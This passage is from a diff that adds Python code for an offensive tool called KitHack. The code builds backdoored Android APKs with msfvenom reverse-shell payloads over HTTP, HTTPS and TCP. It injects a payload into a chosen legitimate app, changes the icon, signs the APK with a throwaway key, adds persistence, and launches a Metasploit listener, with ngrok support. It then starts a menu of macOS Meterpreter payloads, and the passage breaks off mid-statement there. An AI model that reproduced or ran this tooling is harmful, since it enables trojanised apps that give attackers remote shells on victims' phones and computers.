input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_http; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_http; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("{}\n[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif pay == '06': + print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) + print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + '\n') + file.write(mainout) + file.close() + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) + print( + "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/payload -o output/kithack.apk') + location = os.getcwd() + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + # Salida de bucle + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/shell/reverse_https LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif a == '02': + print( + '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} Use the old Metasploit method'.format( + WHITE, YELLOW)) + print('{0}[02]{1} Use the new KitHack method'.format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_https LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif m == '02': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/shell/reverse_https LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + location = os.getcwd() + print( + "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + print( + "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/original -o output/kithack.apk') + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_https; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_https; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("{}\n[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif pay == '07': + print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) + print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + + a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + a = a.zfill(2) + + if a == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + break + else: + Tk().withdraw() + icon = filedialog.askopenfilename( + title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + print("\n{0}ICON: {1}".format(YELLOW, icon)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + file = open("/tmp/data.txt", "w") + file.write(icon + '\n') + file.write(mainout) + file.close() + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) + print( + "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/payload -o output/kithack.apk') + location = os.getcwd() + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/payload output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + # Salida de bucle + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif a == '02': + print( + '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) + print('{0}[01]{1} Use the old Metasploit method'.format( + WHITE, YELLOW)) + print('{0}[02]{1} Use the new KitHack method'.format( + WHITE, YELLOW)) + + m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + m = m.zfill(2) + + if m == '01': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -x {0} -p android/shell/reverse_tcp LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + elif m == '02': + run_network() + LHOST = input( + "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input( + "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + Tk().withdraw() + APK = filedialog.askopenfilename( + title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + var = input( + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + print( + "\n{0}[*] Generating payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p android/shell/reverse_tcp LPORT={0} LHOST={1} R > output/payload.apk'.format(LPORT, LHOST)) + location = os.getcwd() + print( + "{0}[*] Decompiling original APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'cp {0} {1}/output/original.apk && apktool d -f -o output/original output/original.apk'.format(APK, location)) + print( + "\n{0}[*] Decompiling payload APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool d -f -o output/payload output/payload.apk') + print( + "\n{0}[*] Configuring RAT Payload...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + subprocess.Popen(['bash', '-c', '. lib/apkf.sh; rat']) + print( + "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'apktool b output/original -o output/kithack.apk') + if os.path.isfile('output/kithack.apk'): + print( + "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + time.sleep(4) + os.system( + 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + while var.upper() != "N": + print( + "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + ext = mainout + '.apk' + subprocess.Popen( + ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + print( + "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + break + print( + "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + print( + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + os.system('systemctl stop postgresql && clear') + main() + else: + if not ".tcp.ngrok.io" in LHOST: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/shell/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/shell/reverse_tcp; exploit\'"') + pause( + "\n{}Press any key to continue...".format(GREEN)) + os.system( + 'systemctl stop postgresql && clear') + main() + else: + print( + "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + time.sleep(3) + os.system( + 'rm -rf output/original output/payload output/original.apk output/payload.apk output/kithack.apk') + pause("{}Press any key to continue...".format(GREEN)) + os.system('systemctl stop postgresql && clear') + main() + + else: + print("{}\n[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + else: + print("\n{}[X] INVALID OPTION\n".format(RED)) + time.sleep(3) + pause("{}Press any key to continue...".format(GREEN)) + os.system('clear') + main() + + elif sys == '04': + print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) + print( + '{0}[01]{1} osx/x64/meterpreter_reverse_http'.format(WHITE, YELLOW)) + print( + '{0}[02]{1} osx/x64/meterpreter_reverse_https'.format(WHITE, YELLOW)) + print( + '{0}[03]{1} osx/x64/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) + print( + '{0}[04]{1} osx/x64/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[05]{1} osx/x64/shell_reverse_tcp'.format(WHITE, YELLOW)) + print('{0}[06]{1} osx/x86/shell_reverse_tcp'.format(WHITE, YELLOW)) + + pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) + pay = pay.zfill(2) + + if pay == '01': + run_network() + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + OUT = input( + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + mainout = os.path.splitext(OUT)[0] + print( + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + 'systemctl start postgresql && msfvenom -p osx/x64/meterpreter_reverse_http LHOST={0} LPORT={1} -f macho > output/{2}.macho'.format(LHOST, LPORT, mainout)) + location = os.getcwd() + if os.stat('output/{}.macho'.format(mainout)).st_size != 0: + print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.macho".format( + GREEN, DEFAULT, location, mainout)) + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, 